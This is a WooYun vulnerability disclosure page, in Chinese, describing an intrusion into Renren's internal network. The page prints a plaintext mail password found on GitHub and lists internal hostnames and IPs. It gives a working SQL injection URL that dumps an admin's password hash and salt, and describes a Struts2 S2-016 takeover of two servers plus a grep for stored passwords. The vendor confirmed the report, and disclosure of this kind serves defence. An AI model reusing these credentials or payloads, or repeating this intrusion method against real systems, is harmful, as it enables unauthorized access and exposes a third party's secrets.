当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-097554

漏洞标题:一次失败的漫游人人内网

相关厂商:人人网

漏洞作者: 路人甲

提交时间:2015-02-16 17:41

修复时间:2015-04-02 17:42

公开时间:2015-04-02 17:42

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-16: 细节已通知厂商并且等待厂商处理中
2015-02-16: 厂商已经确认,细节仅向厂商公开
2015-02-26: 细节向核心白帽子及相关领域专家公开
2015-03-08: 细节向普通白帽子公开
2015-03-18: 细节向实习白帽子公开
2015-04-02: 细节向公众公开

简要描述:

经验不足导致进入内网后被 t,赞一下 ids.

详细说明:

Github 搜索 smtp.renren-inc.com,搜索到如下:https://github.com/kongzhidea/kongzhidea/blob/b33e58a105189a33191fc09d8efe5332163c3f2e/xweb/.svn/pristine/d9/d97e9f1a893a694f0e64da8680845f97c15b2381.svn-base

mail.host=smtp.renren-inc.com
mail.username=biz.web@renren-inc.com
mail.password=Tiantang090
mail.defaultEncoding=UTF-8


以 biz.web 登录邮箱失败,分析这个项目后,发现其中很多代码的作者都是 yong.cao@renren-inc.com,测试登录,成功。

漏洞证明:

接入 vpn,进内网。
内网很大,基本探测了下,服务器躲在10.* 段,dmz?:

mail.renren-inc.com	10.7.2.18
meeting.renren-inc.com 10.2.10.23
library.renren-inc.com 10.2.10.24
we.renren-inc.com 10.2.15.80
soft.opi-corp.com 10.2.15.42
renren-inc.com 10.7.2.12


办公网地址应该是在 172.x 段。
内网漏洞颇多,简单发几个:

#1 
http://daxue.renren-inc.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
Error: Duplicate entry 'admin:7a795cb9f70b712eb57da3d2f32070d2:d937521' for key 'group_key'
#2
http://meeting.renren-inc.com/login.action s2-016
==> 获取到10.2.10.22、10.2.10.23 的权限,证明可见.ssh/authorized_keys。
==> 10.2.10.22、10.2.10.23 两台机子上有很多密码信息,自行:localte *.xml |grep password

修复方案:

# 网络边界
# 员工安全意识

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-02-16 17:57

厂商回复:

过年了,别黑了,感谢感谢

最新状态:

暂无